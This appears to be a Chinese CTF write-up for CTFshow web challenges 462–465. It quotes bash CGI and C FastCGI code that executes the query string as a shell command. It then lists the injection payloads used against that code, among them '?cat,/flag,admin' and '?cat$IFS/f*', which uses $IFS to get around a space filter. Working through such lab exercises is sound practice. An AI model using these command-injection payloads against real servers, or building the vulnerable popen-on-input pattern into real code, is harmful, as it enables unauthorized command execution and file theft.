kali转bash shell方法
方便我们本地
bash脚本教程
下面这个代码是bash脚本
#!/bin/bash
OIFS="$IFS"
IFS="," //表示逗号为字段分隔符
set $QUERY_STRING //将参数传入数组
Args=($QUERY_STRING)
IFS="$OIFS" //恢复原始IFS值
if [ "${Args[2]}"ctf = "admin"ctf ]; then
echo "`${Args[0]}$IFS${Args[1]}`"
fi //结束if语句
exit 0
我们靠传入的角标为0 1 的值构造命令
?ls,/,admin
?cat,/flag,admin
web462
#!/bin/bash
OIFS="$IFS"
IFS=","
set $QUERY_STRING
Args=($QUERY_STRING)
IFS="$OIFS"
if [ "${Args[0]}"ctf = "ping"ctf ]; then
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"
addr="ping -c 1 "$addr
$addr
fi
这个是思路看不懂代码先欠着
addr="`echo ${Args[1]} | sed 's|[\]||g' | sed 's|%20| |g'`"这句怎么看都晕,打通以后来改文章
?ping,
web463
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
FILE * fp;
char * p = NULL;
int res = -1;
if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
{
printf("Param Error!\n");
return -1;
}
if ((fp = popen(cmd, "r") ) == NULL) //执行命令并且创造一个管道将放回结果放入管道里面
{
printf("Popen Error!\n");
return -2;
}
else
{
memset(pRetMsg, 0, msg_len);
//get lastest result
while(fgets(pRetMsg, msg_len, fp) != NULL)
{
printf("Msg:%s",pRetMsg); //print all info
}
if ( (res = pclose(fp)) == -1) //输出管道
{
printf("close popenerror!\n");
return -3;
}
pRetMsg[strlen(pRetMsg)-1] = '\0';
return 0;
}
}
int main(void)
{
int count = 0;
char *cmd = "";
char a8Result[128] = {0};
int ret = 0;
while (FCGI_Accept() >= 0)
printf("Content-type: text/html\r\n"
"\r\n"
"<title>CTFshow</title>"
"<h1>where is flag?</h1>"
);
cmd=getenv("QUERY_STRING");
ret = _System(cmd, a8Result, sizeof(a8Result));
printf("ret = %d \nresult = %s\nlength = %d \n", ret, a8Result, strlen(a8Result));
return 0;
}
试探性的上了一个ls,回显了,然后过滤了空格,尝试了一下$IFS可以绕过
?cat$IFS/f*
?cat${IFS}/f*
web464
#include <stdlib.h>
#include "fcgi_stdio.h"
#include <cstring>
/* just get lastest info */
int _System(const char * cmd, char *pRetMsg, int msg_len)
{
FILE * fp;
char * p = NULL;
int res = -1;
if (cmd == NULL || pRetMsg == NULL || msg_len < 0)
{
printf("Param Error!\n");
return -1;
}
if ((fp = popen(cmd, "r") ) == NULL)
{
printf("Popen Error!\n");
return -2;
}
else
{
memset(pRetMsg, 0, msg_len);
//get lastest result
while(fgets(pRetMsg, msg_len, fp) != NULL)
{
printf("Msg:%s",pRetMsg); //print all info
}
if ( (res = pclose(fp)) == -1)
{
printf("close popenerror!\n");
return -3;
}
pRetMsg[strlen(pRetMsg)-1] = '\0';
return 0;
}
}
int main(void)
{
int count = 0;
char *cmd = "";
char a8Result[128] = {0};
int ret = 0;
while (FCGI_Accept() >= 0)
printf("Content-type: text/html\r\n"
"\r\n"
"<title>CTFshow</title>"
"<h1>where is flag?</h1>"
);
cmd=getenv("QUERY_STRING");
ret = _System(cmd, a8Result, sizeof(a8Result));
return 0;
}
与上题一样直接秒了
我只是想尝试一下没想到打通了
?cat$IFS/f*
web465
要用pwn 不会